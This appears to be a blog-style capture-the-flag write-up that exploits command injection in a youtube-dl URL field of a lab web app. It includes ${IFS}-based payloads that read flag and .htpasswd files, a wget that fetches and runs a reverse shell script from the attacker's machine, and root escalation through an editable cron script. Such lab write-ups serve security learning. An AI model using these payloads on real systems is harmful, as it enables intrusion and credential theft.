Savaş Saygılı

It’s a very good lab and you can test lots of different topics at the same time;

# I scan with nmap

sudo nmap -sV 10.10.124.59

# find web port to open and browse it;

# in parallel I start dirbsearch to find folders

sudo ./dirsearch.py -u http://10.10.124.59 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e js,php,html -x 403,404

# so first question answer we find quickly /admin folder our secret folder;

#so I understand basic Authentication and user credential need; I started password attack and also the as same time I started to web application testing

in Burp i start request manipulations ;

First thing i investigate yt_url part when i write

# |ls

i can execute my command, and after that, i think very simple room to solve;

#but after that i sent lots of Linux command and take every time to error; so i more create error and search from internet youtube-dl

# i find source code off youtube_dl

ytdl-org/youtube-dlyoutube-dl – download videos from youtube.com or other video platforms To install it right away for all UNIX users…github.com

# my test i every time took error about not true parameter and options; so when looked github page i saw valid options

# and send first option — help over burp

yt_url — help

and bingoo — help options worked for me; all help information i can saw in response ,

# after that step i try to send more powerful command which one help to reach my aim, and i spend 1,5 about that;

#main problem simple command like ls, id executed but when i try to execute ls -al every time take syntax errors; so i more focus sent command without space;

#Google best helper me search :

“How to send a command with arguments without spaces?”

How to send a command with arguments without spaces?Thanks for contributing an answer to Unix & Linux Stack Exchange! Please be sure to answer the question. Provide…unix.stackexchange.com

and find a true perspective

cat${IFS}file.txt

So using ${IFS} i can send command using without space; but before this job i send all my request burp repeater to more efficiently manipulation;

#please be careful that part because our parameter must be;

— version;ls${IFS}-al;

note: (- -) in the display looks like — and also you can use all option — help; — execute, — version

#so i can access all command that method; now i try to access /admin folder;

yt_url= — version;ls${IFS}/var/www/html/admin${IFS}-al;

# found .htpasswd and flag.txt

for reading flag.txt

yt_url= — version;cat${IFS}/var/www/html/admin/flag.txt;

and as the same method when you look to .htpasswd;

yt_url= — version;cat${IFS}/var/www/html/admin/.htpasswd;

you can find user;

Now i need to ever shell to execute for that reason i prepare bash based reverse shell.sh in my kali computer.

and start my kali

python -m SimpleHTTPServer 8090

and over burp vulnerable machine i try to install that file

yt_url= — version;wget${IFS}http://10.9.32.166:8090/shell.sh;

— version;chmod${IFS}755${IFS}/var/www/html/shell.sh;

so i installed and give execution permission after that i start in my kali nc to listen;

when over burp start shell.sh have shell 🙂

–version;bash${IFS}shell.sh;

#when i have console i look all method spend 2 hours and last i find one way only change; is there clean.sh script under temp folder; and some cronjob execute it periodically and editable from my self; (how can i know only CTF experience)

so i try to execute that command;

echo ‘ cat /root/root.txt >root-oldum’ >>clean.sh

and bingo i have root-oldum file as the same directory includes root.txt flag.

Super CTF Thank you overjt